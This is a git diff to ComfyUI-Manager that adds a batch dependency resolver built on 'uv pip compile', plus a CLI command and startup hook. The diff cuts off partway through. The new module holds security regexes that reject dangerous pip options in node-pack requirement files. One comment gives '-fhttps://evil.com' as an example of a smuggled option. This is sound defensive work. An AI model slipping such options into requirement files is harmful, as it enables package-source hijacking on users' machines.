diff --git a/.gitignore b/.gitignore
index f00db96b..e7c41bd8 100644
--- a/.gitignore
+++ b/.gitignore
@@ -21,4 +21,6 @@ check2.sh
build
dist
*.egg-info
-.env
\ No newline at end of file
+.env
+.claude
+test_venv
diff --git a/cm_cli/__main__.py b/cm_cli/__main__.py
index 36120174..9d6e9984 100644
--- a/cm_cli/__main__.py
+++ b/cm_cli/__main__.py
@@ -656,6 +656,14 @@ def install(
help="Skip installing any Python dependencies",
),
] = False,
+ uv_compile: Annotated[
+ Optional[bool],
+ typer.Option(
+ "--uv-compile",
+ show_default=False,
+ help="After installing, batch-resolve all dependencies via uv pip compile",
+ ),
+ ] = False,
user_directory: str = typer.Option(
None,
help="user directory"
@@ -667,11 +675,34 @@ def install(
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
- cmd_ctx.set_no_deps(no_deps)
+
+ if uv_compile and no_deps:
+ print("[bold red]--uv-compile and --no-deps are mutually exclusive.[/bold red]")
+ raise typer.Exit(1)
+
+ if uv_compile:
+ cmd_ctx.set_no_deps(True)
+ else:
+ cmd_ctx.set_no_deps(no_deps)
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
for_each_nodes(nodes, act=install_node, exit_on_fail=exit_on_fail)
- pip_fixer.fix_broken()
+
+ if uv_compile:
+ try:
+ _run_unified_resolve()
+ except ImportError as e:
+ print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
+ raise typer.Exit(1)
+ except typer.Exit:
+ raise
+ except Exception as e:
+ print(f"[bold red]Batch resolution failed: {e}[/bold red]")
+ raise typer.Exit(1)
+ finally:
+ pip_fixer.fix_broken()
+ else:
+ pip_fixer.fix_broken()
@app.command(help="Reinstall custom nodes")
@@ -1223,6 +1254,77 @@ def install_deps(
print("Dependency installation and activation complete.")
+def _run_unified_resolve():
+ """Shared logic for unified batch dependency resolution."""
+ from comfyui_manager.common.unified_dep_resolver import (
+ UnifiedDepResolver,
+ UvNotAvailableError,
+ collect_base_requirements,
+ collect_node_pack_paths,
+ )
+
+ node_pack_paths = collect_node_pack_paths(cmd_ctx.get_custom_nodes_paths())
+ if not node_pack_paths:
+ print("[bold yellow]No custom node packs found.[/bold yellow]")
+ return
+
+ print(f"Resolving dependencies for {len(node_pack_paths)} node pack(s)...")
+
+ resolver = UnifiedDepResolver(
+ node_pack_paths=node_pack_paths,
+ base_requirements=collect_base_requirements(comfy_path),
+ blacklist=cm_global.pip_blacklist,
+ overrides=cm_global.pip_overrides,
+ downgrade_blacklist=cm_global.pip_downgrade_blacklist,
+ )
+ try:
+ result = resolver.resolve_and_install()
+ except UvNotAvailableError:
+ print("[bold red]uv is not available. Install uv to use this feature.[/bold red]")
+ raise typer.Exit(1)
+
+ if result.success:
+ collected = result.collected
+ if collected:
+ print(
+ f"[bold green]Resolved {len(collected.requirements)} deps "
+ f"from {len(collected.sources)} source(s) "
+ f"(skipped {len(collected.skipped)}).[/bold green]"
+ )
+ else:
+ print("[bold green]Resolution complete (no deps needed).[/bold green]")
+ else:
+ print(f"[bold red]Resolution failed: {result.error}[/bold red]")
+ raise typer.Exit(1)
+
+
+@app.command(
+ "uv-compile",
+ help="Batch-resolve and install all custom node dependencies via uv pip compile.",
+)
+def unified_uv_compile(
+ user_directory: str = typer.Option(
+ None,
+ help="user directory"
+ ),
+):
+ cmd_ctx.set_user_directory(user_directory)
+
+ pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
+ try:
+ _run_unified_resolve()
+ except ImportError as e:
+ print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
+ raise typer.Exit(1)
+ except typer.Exit:
+ raise
+ except Exception as e:
+ print(f"[bold red]Unexpected error: {e}[/bold red]")
+ raise typer.Exit(1)
+ finally:
+ pip_fixer.fix_broken()
+
+
@app.command(help="Clear reserved startup action in ComfyUI-Manager")
def clear():
cancel()
diff --git a/comfyui_manager/common/manager_util.py b/comfyui_manager/common/manager_util.py
index 5a798043..84b88810 100644
--- a/comfyui_manager/common/manager_util.py
+++ b/comfyui_manager/common/manager_util.py
@@ -25,6 +25,7 @@ comfyui_manager_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '
cache_dir = os.path.join(comfyui_manager_path, '.cache') # This path is also updated together in **manager_core.update_user_directory**.
use_uv = False
+use_unified_resolver = False
bypass_ssl = False
def is_manager_pip_package():
diff --git a/comfyui_manager/common/unified_dep_resolver.py b/comfyui_manager/common/unified_dep_resolver.py
new file mode 100644
index 00000000..fc5c0e35
--- /dev/null
+++ b/comfyui_manager/common/unified_dep_resolver.py
@@ -0,0 +1,703 @@
+"""Unified Dependency Resolver for ComfyUI Manager.
+
+Resolves and installs all node-pack dependencies at once using ``uv pip compile``
+followed by ``uv pip install -r``, replacing per-node-pack ``pip install`` calls.
+
+Responsibility scope
+--------------------
+- Dependency collection, resolution, and installation **only**.
+- ``install.py`` execution and ``PIPFixer`` calls are the caller's responsibility.
+
+See Also
+--------
+- docs/dev/PRD-unified-dependency-resolver.md
+- docs/dev/DESIGN-unified-dependency-resolver.md
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+import re
+import shutil
+import subprocess
+import sys
+import tempfile
+import time
+from collections import defaultdict
+from dataclasses import dataclass, field
+
+from . import manager_util
+
+logger = logging.getLogger("ComfyUI-Manager")
+
+# ---------------------------------------------------------------------------
+# Exceptions
+# ---------------------------------------------------------------------------
+
+class UvNotAvailableError(RuntimeError):
+ """Raised when neither ``python -m uv`` nor standalone ``uv`` is found."""
+
+
+# ---------------------------------------------------------------------------
+# Data classes
+# ---------------------------------------------------------------------------
+
+@dataclass
+class PackageRequirement:
+ """Individual package dependency."""
+ name: str # Normalised package name
+ spec: str # Original spec string (e.g. ``torch>=2.0``)
+ source: str # Absolute path of the source node pack
+
+
+@dataclass
+class CollectedDeps:
+ """Aggregated dependency collection result."""
+ requirements: list[PackageRequirement] = field(default_factory=list)
+ skipped: list[tuple[str, str]] = field(default_factory=list)
+ sources: dict[str, list[str]] = field(default_factory=dict)
+ extra_index_urls: list[str] = field(default_factory=list)
+
+
+@dataclass
+class LockfileResult:
+ """Result of ``uv pip compile``."""
+ success: bool
+ lockfile_path: str | None = None
+ conflicts: list[str] = field(default_factory=list)
+ stderr: str = ""
+
+
+@dataclass
+class InstallResult:
+ """Result of ``uv pip install -r`` (atomic: all-or-nothing)."""
+ success: bool
+ installed: list[str] = field(default_factory=list)
+ skipped: list[str] = field(default_factory=list)
+ stderr: str = ""
+
+
+@dataclass
+class ResolveResult:
+ """Full pipeline result."""
+ success: bool
+ collected: CollectedDeps | None = None
+ lockfile: LockfileResult | None = None
+ install: InstallResult | None = None
+ error: str | None = None
+
+
+# ---------------------------------------------------------------------------
+# Resolver
+# ---------------------------------------------------------------------------
+
+_TMP_PREFIX = "comfyui_resolver_"
+
+# Security: reject dangerous requirement patterns at line start.
+# NOTE: This regex is intentionally kept alongside _INLINE_DANGEROUS_OPTIONS
+# because it covers ``@ file://`` via ``.*@\s*file://`` which relies on the
+# ``^`` anchor. Both regexes share responsibility for option rejection:
+# this one catches line-start patterns; _INLINE_DANGEROUS_OPTIONS catches
+# options appearing after a package name.
+_DANGEROUS_PATTERNS = re.compile(
+ r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
+ r'|--find-links\b|-f\b|.*@\s*file://)',
+ re.IGNORECASE,
+)
+
+# Security: reject dangerous pip options appearing anywhere in the line
+# (supplements the ^-anchored _DANGEROUS_PATTERNS which only catches line-start).
+# The ``(?:^|\s)`` prefix prevents false positives on hyphenated package names
+# (e.g. ``re-crypto``, ``package[extra-c]``) while still catching concatenated
+# short-flag attacks like ``-fhttps://evil.com``.
+_INLINE_DANGEROUS_OPTIONS = re.compile(
+ r'(?:^|\s)(--find-links\b|--constraint\b|--requirement\b|--editable\b'
+ r'|--trusted-host\b|--global-option\b|--install-option\b'
+ r'|-f|-r|-e|-c)',
+ re.IGNORECASE,
+)
+
+# Credential redaction in index URLs.
+_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
+
+# Version-spec parsing (same regex as existing ``is_blacklisted()``).
+_VERSION_SPEC_PATTERN = re.compile(r'([^<>!~=]+)([<>!~=]=?)([^ ]*)')
+
+
+
+def collect_node_pack_paths(custom_nodes_dirs: list[str]) -> list[str]:
+ """Collect all installed node-pack directory paths.
+
+ Parameters
+ ----------
+ custom_nodes_dirs:
+ Base directories returned by ``folder_paths.get_folder_paths('custom_nodes')``.
+
+ Returns
+ -------
+ list[str]
+ Paths of node-pack directories (immediate subdirectories of each base).
+ """
+ paths: list[str] = []
+ for base in custom_nodes_dirs:
+ if os.path.isdir(base):
+ for name in os.listdir(base):
+ fullpath = os.path.join(base, name)
+ if os.path.isdir(fullpath):
+ paths.append(fullpath)
+ return paths
+
+
+def collect_base_requirements(comfy_path: str) -> list[str]:
+ """Read ComfyUI's own base requirements as constraint lines.
+
+ Reads ``requirements.txt`` and ``manager_requirements.txt`` from *comfy_path*.
+ These are ComfyUI-level dependencies only — never read from node packs.
+
+ Parameters
+ ----------
+ comfy_path:
+ Root directory of the ComfyUI installation.
+
+ Returns
+ -------
+ list[str]
+ Non-empty, non-comment requirement lines.
+ """
+ reqs: list[str] = []
+ for filename in ("requirements.txt", "manager_requirements.txt"):
+ req_path = os.path.join(comfy_path, filename)
+ if os.path.exists(req_path):
+ with open(req_path, encoding="utf-8") as f:
+ reqs.extend(
+ line.strip() for line in f
+ if line.strip() and not line.strip().startswith('#')
+ )
+ return reqs
+
+
+class UnifiedDepResolver:
+ """Unified dependency resolver.
+
+ Resolves and installs all dependencies of (installed + new) node packs at
+ once using *uv*.
+
+ Parameters
+ ----------
+ node_pack_paths:
+ Absolute paths of node-pack directories to consider.
+ base_requirements:
+ Lines from ComfyUI's own ``requirements.txt`` (used as constraints).
+ blacklist:
+ Package names to skip unconditionally (default: ``cm_global.pip_blacklist``).
+ overrides:
+ Package-name remapping dict (default: ``cm_global.pip_overrides``).
+ downgrade_blacklist:
+ Packages whose installed versions must not be downgraded
+ (default: ``cm_global.pip_downgrade_blacklist``).
+ """
+
+ def __init__(
+ self,
+ node_pack_paths: list[str],
+ base_requirements: list[str] | None = None,
+ blacklist: set[str] | None = None,
+ overrides: dict[str, str] | None = None,
+ downgrade_blacklist: list[str] | None = None,
+ ) -> None:
+ self.node_pack_paths = node_pack_paths
+ self.base_requirements = base_requirements or []
+ self.blacklist: set[str] = blacklist if blacklist is not None else set()
+ self.overrides: dict[str, str] = overrides if overrides is not None else {}
+ self.downgrade_blacklist: list[str] = (
+ downgrade_blacklist if downgrade_blacklist is not None else []
+ )
+
+ # ------------------------------------------------------------------
+ # Public API
+ # ------------------------------------------------------------------
+
+ def resolve_and_install(self) -> ResolveResult:
+ """Execute the full pipeline: cleanup → collect → compile → install."""
+ self.cleanup_stale_tmp()
+
+ tmp_dir: str | None = None
+ try:
+ # 1. Collect
+ collected = self.collect_requirements()
+ if not collected.requirements:
+ logger.info("[UnifiedDepResolver] No dependencies to resolve")
+ return ResolveResult(success=True, collected=collected)
+
+ logger.info(
+ "[UnifiedDepResolver] Collected %d deps from %d sources (skipped %d)",
+ len(collected.requirements),
+ len(collected.sources),
+ len(collected.skipped),
+ )
+
+ # 2. Compile
+ lockfile = self.compile_lockfile(collected)
+ if not lockfile.success:
+ return ResolveResult(
+ success=False,
+ collected=collected,
+ lockfile=lockfile,
+ error=f"compile failed: {'; '.join(lockfile.conflicts)}",
+ )
+ # tmp_dir is the parent of lockfile_path
+ tmp_dir = os.path.dirname(lockfile.lockfile_path) # type: ignore[arg-type]
+
+ # 3. Install
+ install = self.install_from_lockfile(lockfile.lockfile_path) # type: ignore[arg-type]
+ return ResolveResult(
+ success=install.success,
+ collected=collected,
+ lockfile=lockfile,
+ install=install,
+ error=install.stderr if not install.success else None,
+ )
+ except UvNotAvailableError:
+ raise
+ except Exception as exc:
+ logger.warning("[UnifiedDepResolver] unexpected error: %s", exc)
+ return ResolveResult(success=False, error=str(exc))
+ finally:
+ if tmp_dir and os.path.isdir(tmp_dir):
+ shutil.rmtree(tmp_dir, ignore_errors=True)
+
+ # ------------------------------------------------------------------
+ # Step 1: collect
+ # ------------------------------------------------------------------
+
+ def collect_requirements(self) -> CollectedDeps:
+ """Collect dependencies from all node packs."""
+ requirements: list[PackageRequirement] = []
+ skipped: list[tuple[str, str]] = []
+ sources: dict[str, list[str]] = defaultdict(list)
+ extra_index_urls: list[str] = []
+
+ # Snapshot installed packages once to avoid repeated subprocess calls.
+ # Skip when downgrade_blacklist is empty (the common default).
+ installed_snapshot = (
+ manager_util.get_installed_packages()
+ if self.downgrade_blacklist else {}
+ )
+
+ for pack_path in self.node_pack_paths:
+ # Exclude disabled node packs (directory-based mechanism).
+ if self._is_disabled_path(pack_path):
+ continue
+
+ req_file = os.path.join(pack_path, "requirements.txt")
+ if not os.path.exists(req_file):
+ continue
+
+ for raw_line in self._read_requirements(req_file):
+ line = raw_line.split('#')[0].strip()
+ if not line:
+ continue
+
+ # 0. Security: reject dangerous patterns
+ if _DANGEROUS_PATTERNS.match(line):
+ skipped.append((line, f"rejected: dangerous pattern in {pack_path}"))
+ logger.warning(
+ "[UnifiedDepResolver] rejected dangerous line: '%s' from %s",
+ line, pack_path,
+ )
+ continue
+
+ # 1. Separate --index-url / --extra-index-url handling
+ # (before path separator check, because URLs contain '/')
+ # URLs are staged but NOT committed until the line passes
+ # all validation (prevents URL injection from rejected lines).
+ pending_urls: list[str] = []
+ if '--index-url' in line or '--extra-index-url' in line:
+ pkg_spec, pending_urls = self._split_index_url(line)
+ line = pkg_spec
+ if not line:
+ # Standalone option line (no package prefix) — safe
+ extra_index_urls.extend(pending_urls)
+ continue
+
+ # 1b. Reject dangerous pip options appearing after package name
+ # (--index-url/--extra-index-url already extracted above)
+ if _INLINE_DANGEROUS_OPTIONS.search(line):
+ skipped.append((line, f"rejected: inline pip option in {pack_path}"))
+ logger.warning(
+ "[UnifiedDepResolver] rejected inline pip option: '%s' from %s",
+ line, pack_path,
+ )
+ continue
+
+ # Reject path separators in package name portion
+ pkg_name_part = re.split(r'[><=!~;]', line)[0]
+ if '/' in pkg_name_part or '\\' in pkg_name_part:
+ skipped.append((line, "rejected: path separator in package name"))
+ logger.warning(
+ "[UnifiedDepResolver] rejected path separator: '%s' from %s",
+ line, pack_path,
+ )
+ continue
+
+ # 2. Remap package name
+ pkg_spec = self._remap_package(line)
+
+ # 3. Extract normalised name
+ pkg_name = self._extract_package_name(pkg_spec)
+
+ # 4. Blacklist check
+ if pkg_name in self.blacklist:
+ skipped.append((pkg_spec, "blacklisted"))
+ continue
+
+ # 5. Downgrade blacklist check
+ if self._is_downgrade_blacklisted(pkg_name, pkg_spec,
+ installed_snapshot):
+ skipped.append((pkg_spec, "downgrade blacklisted"))
+ continue
+
+ # 6. Collect (no dedup — uv handles resolution)
+ requirements.append(
+ PackageRequirement(name=pkg_name, spec=pkg_spec, source=pack_path)
+ )
+ sources[pkg_name].append(pack_path)
+
+ # Commit staged index URLs only after all validation passed.
+ if pending_urls:
+ extra_index_urls.extend(pending_urls)
+
+ return CollectedDeps(
+ requirements=requirements,
+ skipped=skipped,
+ sources=dict(sources),
+ extra_index_urls=list(set(extra_index_urls)),
+ )
+
+ # ------------------------------------------------------------------
+ # Step 2: compile
+ # ------------------------------------------------------------------
+
+ def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
+ """Generate pinned requirements via ``uv pip compile``."""
+ tmp_dir = tempfile.mkdtemp(prefix=_TMP_PREFIX)
+
+ try:
+ # Write temp requirements
+ tmp_req = os.path.join(tmp_dir, "input-requirements.txt")
+ with open(tmp_req, "w", encoding="utf-8") as fh:
+ for req in deps.requirements:
+ fh.write(req.spec + "\n")
+
+ # Write constraints (base dependencies)
+ tmp_constraints: str | None = None
+ if self.base_requirements:
+ tmp_constraints = os.path.join(tmp_dir, "constraints.txt")
+ with open(tmp_constraints, "w", encoding="utf-8") as fh:
+ for line in self.base_requirements:
+ fh.write(line.strip() + "\n")
+
+ lockfile_path = os.path.join(tmp_dir, "resolved-requirements.txt")
+
+ cmd = self._get_uv_cmd() + [
+ "pip", "compile",
+ tmp_req,
+ "--output-file", lockfile_path,
+ "--python", sys.executable,
+ ]
+ if tmp_constraints:
+ cmd += ["--constraint", tmp_constraints]
+
+ for url in deps.extra_index_urls:
+ logger.info(
+ "[UnifiedDepResolver] extra-index-url: %s",
+ self._redact_url(url),
+ )
+ cmd += ["--extra-index-url", url]
+
+ logger.info("[UnifiedDepResolver] running: %s", " ".join(
+ self._redact_url(c) for c in cmd
+ ))
+
+ try:
+ result = subprocess.run(
+ cmd,
+ capture_output=True,
+ text=True,
+ timeout=300,
+ )
+ except subprocess.TimeoutExpired:
+ logger.warning("[UnifiedDepResolver] uv pip compile timed out (300s)")
+ return LockfileResult(
+ success=False,
+ conflicts=["compile timeout exceeded (300s)"],
+ stderr="TimeoutExpired",
+ )
+
+ if result.returncode != 0:
+ conflicts = self._parse_conflicts(result.stderr)
+ return LockfileResult(
+ success=False,
+ conflicts=conflicts,
+ stderr=result.stderr,
+ )
+
+ if not os.path.exists(lockfile_path):
+ return LockfileResult(
+ success=False,
+ conflicts=["lockfile not created despite success return code"],
+ stderr=result.stderr,
+ )
+
+ return LockfileResult(success=True, lockfile_path=lockfile_path)
+
+ except UvNotAvailableError:
+ shutil.rmtree(tmp_dir, ignore_errors=True)
+ raise
+ except Exception:
+ shutil.rmtree(tmp_dir, ignore_errors=True)
+ raise
+
+ # ------------------------------------------------------------------
+ # Step 3: install
+ # ------------------------------------------------------------------
+
+ def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
+ """Install from pinned requirements (``uv pip install -r``).
+
+ Do **not** use ``uv pip sync`` — it deletes packages not in the
+ lockfile, risking removal of torch, ComfyUI deps, etc.
+ """
+ cmd = self._get_uv_cmd() + [
+ "pip", "install",
+ "--requirement", lockfile_path,
+ "--python", sys.executable,
+ ]
+
+ logger.info("[UnifiedDepResolver] running: %s", " ".join(cmd))
+
+ try:
+ result = subprocess.run(
+ cmd,
+ capture_output=True,
+ text=True,
+ timeout=600,
+ )
+ except subprocess.TimeoutExpired:
+ logger.warning("[UnifiedDepResolver] uv pip install timed out (600s)")
+ return InstallResult(
+ success=False,
+ stderr="TimeoutExpired: install exceeded 600s",
+ )
+
+ installed, skipped_pkgs = self._parse_install_output(result)
+
+ return InstallResult(
+ success=result.returncode == 0,
+ installed=installed,
+ skipped=skipped_pkgs,
+ stderr=result.stderr if result.returncode != 0 else "",
+ )
+
+ # ------------------------------------------------------------------
+ # uv command resolution
+ # ------------------------------------------------------------------
+
+ def _get_uv_cmd(self) -> list[str]:
+ """Determine the ``uv`` command to use.
+
+ ``python_embeded`` spelling is intentional — matches the actual path
+ name in the ComfyUI Windows distribution.
+ """
+ embedded = 'python_embeded' in sys.executable
+
+ # 1. Try uv as a Python module
+ try:
+ test_cmd = (
+ [sys.executable]
+ + (['-s'] if embedded else [])
+ + ['-m', 'uv', '--version']
+ )
+ subprocess.check_output(test_cmd, stderr=subprocess.DEVNULL, timeout=5)
+ return [sys.executable] + (['-s'] if embedded else []) + ['-m', 'uv']
+ except Exception:
+ pass
+
+ # 2. Standalone uv executable
+ if shutil.which('uv'):
+ return ['uv']
+
+ raise UvNotAvailableError("uv is not available")
+
+ # ------------------------------------------------------------------
+ # Helpers — collection
+ # ------------------------------------------------------------------
+
+ @staticmethod
+ def _is_disabled_path(path: str) -> bool:
+ """Return ``True`` if *path* is within a ``.disabled`` directory."""
+ # New style: custom_nodes/.disabled/{name}
+ if '/.disabled/' in path or os.path.basename(os.path.dirname(path)) == '.disabled':
+ return True
+ # Old style: {name}.disabled suffix
+ if path.rstrip('/').endswith('.disabled'):
+ return True
+ return False
+
+ @staticmethod
+ def _read_requirements(filepath: str) -> list[str]:
+ """Read requirements file using ``robust_readlines`` pattern."""
+ return manager_util.robust_readlines(filepath)
+
+ @staticmethod
+ def _split_index_url(line: str) -> tuple[str, list[str]]:
+ """Split index-url options from a requirement line.
+
+ Handles lines with one or more ``--index-url`` / ``--extra-index-url``
+ options. Returns ``(package_spec, [url, ...])``.
+
+ Examples::
+
+ "torch --extra-index-url U1 --index-url U2"
+ → ("torch", ["U1", "U2"])
+
+ "--index-url URL"
+ → ("", ["URL"])
+ """
+ urls: list[str] = []
+ remainder_tokens: list[str] = []
+
+ # Regex: match --extra-index-url or --index-url followed by its value
+ option_re = re.compile(
+ r'(--(?:extra-)?index-url)\s+(\S+)'
+ )
+
+ # Pattern for bare option flags without a URL value
+ bare_option_re = re.compile(r'^--(?:extra-)?index-url$')
+
+ last_end = 0
+ for m in option_re.finditer(line):
+ # Text before this option is part of the package spec
+ before = line[last_end:m.start()].strip()
+ if before:
+ remainder_tokens.append(before)
+ urls.append(m.group(2))
+ last_end = m.end()
+
+ # Trailing text after last option
+ trailing = line[last_end:].strip()
+ if trailing:
+ remainder_tokens.append(trailing)
+
+ # Strip any bare option flags that leaked into remainder tokens
+ # (e.g. "--index-url" with no URL value after it)
+ remainder_tokens = [
+ t for t in remainder_tokens if not bare_option_re.match(t)
+ ]
+
+ pkg_spec = " ".join(remainder_tokens).strip()
+ return pkg_spec, urls
+
+ def _remap_package(self, pkg: str) -> str:
+ """Apply ``pip_overrides`` remapping."""
+ if pkg in self.overrides:
+ remapped = self.overrides[pkg]
+ logger.info("[UnifiedDepResolver] '%s' remapped to '%s'", pkg, remapped)
+ return remapped
+ return pkg
+
+ @staticmethod
+ def _extract_package_name(spec: str) -> str:
+ """Extract normalised package name from a requirement spec."""
+ name = re.split(r'[><=!~;\[@ ]', spec)[0].strip()
+ return name.lower().replace('-', '_')
+
+ def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str,
+ installed: dict) -> bool:
+ """Reproduce the downgrade logic from ``is_blacklisted()``.
+
+ Uses ``manager_util.StrictVersion`` — **not** ``packaging.version``.
+
+ Args:
+ installed: Pre-fetched snapshot from
+ ``manager_util.get_installed_packages()``.
+ """
+ if pkg_name not in self.downgrade_blacklist:
+ return False
+
+ match = _VERSION_SPEC_PATTERN.search(pkg_spec)
+
+ if match is None:
+ # No version spec: prevent reinstall if already installed
+ if pkg_name in installed:
+ return True
+ elif match.group(2) in ('<=', '==', '<', '~='):
+ if pkg_name in installed:
+ try:
+ installed_ver = manager_util.StrictVersion(installed[pkg_name])
+ requested_ver = manager_util.StrictVersion(match.group(3))
+ if installed_ver >= requested_ver:
+ return True
+ except (ValueError, TypeError):
+ logger.warning(
+ "[UnifiedDepResolver] version parse failed: %s", pkg_spec,
+ )
+ return False
+
+ return False
+
+ # ------------------------------------------------------------------
+ # Helpers — parsing & output
+ # ------------------------------------------------------------------
+
+ @staticmethod
+ def _parse_conflicts(stderr: str) -> list[str]:
+ """Extract conflict descriptions from ``uv pip compile`` stderr."""
+ conflicts: list[str] = []
+ for line in stderr.splitlines():
+ line = line.strip()
+ if line and ('conflict' in line.lower() or 'error' in line.lower()):
+ conflicts.append(line)
+ return conflicts or [stderr.strip()] if stderr.strip() else []
+
+ @staticmethod
+ def _parse_install_output(
+ result: subprocess.CompletedProcess[str],
+ ) -> tuple[list[str], list[str]]:
+ """Parse ``uv pip install`` stdout for installed/skipped packages."""
+ installed: list[str] = []
+ skipped_pkgs: list[str] = []
+ for line in result.stdout.splitlines():
+ line_lower = line.strip().lower()
+ if 'installed' in line_lower or 'updated' in line_lower:
+ installed.append(line.strip())
+ elif 'already' in line_lower or 'satisfied' in line_lower:
+ skipped_pkgs.append(line.strip())
+ return installed, skipped_pkgs
+
+ @staticmethod
+ def _redact_url(url: str) -> str:
+ """Mask ``user:pass@`` credentials in URLs."""
+ return _CREDENTIAL_PATTERN.sub('://****@', url)
+
+ # ------------------------------------------------------------------
+ # Temp-file housekeeping
+ # ------------------------------------------------------------------
+
+ @classmethod
+ def cleanup_stale_tmp(cls, max_age_seconds: int = 3600) -> None:
+ """Remove stale temp directories from previous abnormal terminations."""
+ tmp_root = tempfile.gettempdir()
+ now = time.time()
+ for entry in os.scandir(tmp_root):
+ if entry.is_dir() and entry.name.startswith(_TMP_PREFIX):
+ try:
+ age = now - entry.stat().st_mtime
+ if age > max_age_seconds:
+ shutil.rmtree(entry.path, ignore_errors=True)
+ logger.info(
+ "[UnifiedDepResolver] cleaned stale tmp: %s", entry.path,
+ )
+ except OSError:
+ pass
diff --git a/comfyui_manager/glob/manager_core.py b/comfyui_manager/glob/manager_core.py
index fc3a549d..1202dd22 100644
--- a/comfyui_manager/glob/manager_core.py
+++ b/comfyui_manager/glob/manager_core.py
@@ -843,7 +843,10 @@ class UnifiedManager:
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
return try_install_script(url, repo_path, install_cmd)
else:
- if os.path.exists(requirements_path) and not no_deps:
+ if not no_deps and manager_util.use_unified_resolver:
+ # Unified mode: skip per-node pip install (deps resolved at startup batch)
+ logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
+ elif os.path.exists(requirements_path) and not no_deps:
print("Install: pip packages")
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
lines = manager_util.robust_readlines(requirements_path)
@@ -1604,6 +1607,7 @@ def write_config():
config['default'] = {
'git_exe': get_config()['git_exe'],
'use_uv': get_config()['use_uv'],
+ 'use_unified_resolver': get_config()['use_unified_resolver'],
'channel_url': get_config()['channel_url'],
'share_option': get_config()['share_option'],
'bypass_ssl': get_config()['bypass_ssl'],
@@ -1642,12 +1646,16 @@ def read_config():
return default_conf[key].lower() == 'true' if key in default_conf else False
manager_util.use_uv = default_conf['use_uv'].lower() == 'true' if 'use_uv' in default_conf else False
+ # Don't override use_unified_resolver here: prestartup_script.py already reads config
+ # and sets this flag, then may reset it to False on resolver fallback.
+ # Re-reading from config would undo the fallback.
manager_util.bypass_ssl = get_bool('bypass_ssl', False)
return {
'http_channel_enabled': get_bool('http_channel_enabled', False),
'git_exe': default_conf.get('git_exe', ''),
'use_uv': get_bool('use_uv', True),
+ 'use_unified_resolver': get_bool('use_unified_resolver', False),
'channel_url': default_conf.get('channel_url', DEFAULT_CHANNEL),
'default_cache_as_channel_url': get_bool('default_cache_as_channel_url', False),
'share_option': default_conf.get('share_option', 'all').lower(),
@@ -1668,12 +1676,14 @@ def read_config():
import importlib.util
# temporary disable `uv` on Windows by default (https://github.com/Comfy-Org/ComfyUI-Manager/issues/1969)
manager_util.use_uv = importlib.util.find_spec("uv") is not None and platform.system() != "Windows"
+ manager_util.use_unified_resolver = False
manager_util.bypass_ssl = False
return {
'http_channel_enabled': False,
'git_exe': '',
'use_uv': manager_util.use_uv,
+ 'use_unified_resolver': False,
'channel_url': DEFAULT_CHANNEL,
'default_cache_as_channel_url': False,
'share_option': 'all',
@@ -1871,7 +1881,6 @@ def __win_check_git_pull(path):
def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=False, no_deps=False):
- # import ipdb; ipdb.set_trace()
install_script_path = os.path.join(repo_path, "install.py")
requirements_path = os.path.join(repo_path, "requirements.txt")
@@ -1879,7 +1888,10 @@ def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=Fa
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
try_install_script(url, repo_path, install_cmd)
else:
- if os.path.exists(requirements_path) and not no_deps:
+ if not no_deps and manager_util.use_unified_resolver:
+ # Unified mode: skip per-node pip install (deps resolved at startup batch)
+ logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
+ elif os.path.exists(requirements_path) and not no_deps:
print("Install: pip packages")
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
with open(requirements_path, "r") as requirements_file:
diff --git a/comfyui_manager/prestartup_script.py b/comfyui_manager/prestartup_script.py
index db90ce4f..121a5194 100644
--- a/comfyui_manager/prestartup_script.py
+++ b/comfyui_manager/prestartup_script.py
@@ -88,6 +88,11 @@ def read_uv_mode():
if 'use_uv' in default_conf:
manager_util.use_uv = default_conf['use_uv'].lower() == 'true'
+
+def read_unified_resolver_mode():
+ if 'use_unified_resolver' in default_conf:
+ manager_util.use_unified_resolver = default_conf['use_unified_resolver'].lower() == 'true'
+
def check_file_logging():
global enable_file_logging
if 'file_logging' in default_conf and default_conf['file_logging'].lower() == 'false':
@@ -96,9 +101,14 @@ def check_file_logging():
read_config()
read_uv_mode()
+read_unified_resolver_mode()
security_check.security_check()
check_file_logging()
+# Module-level flag set by startup batch resolver when it succeeds.
+# Used by execute_lazy_install_script() to skip per-node pip installs.
+_unified_resolver_succeeded = False
+
cm_global.pip_overrides = {}
if os.path.exists(manager_pip_overrides_path):
@@ -581,7 +591,8 @@ def execute_lazy_install_script(repo_path, executable):
install_script_path = os.path.join(repo_path, "install.py")
requirements_path = os.path.join(repo_path, "requirements.txt")
- if os.path.exists(requirements_path):
+ if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
+ # Per-node pip install: only runs if unified resolver is disabled or failed
print(f"Install: pip packages for '{repo_path}'")
lines = manager_util.robust_readlines(requirements_path)
@@ -751,6 +762,38 @@ def execute_startup_script():
print("#######################################################################\n")
+# --- Unified dependency resolver: batch resolution at startup ---
+# Runs unconditionally when enabled, independent of install-scripts.txt existence.
+if manager_util.use_unified_resolver:
+ try:
+ from .common.unified_dep_resolver import (
+ UnifiedDepResolver,
+ UvNotAvailableError,
+ collect_base_requirements,
+ collect_node_pack_paths,
+ )
+
+ _resolver = UnifiedDepResolver(
+ node_pack_paths=collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes')),
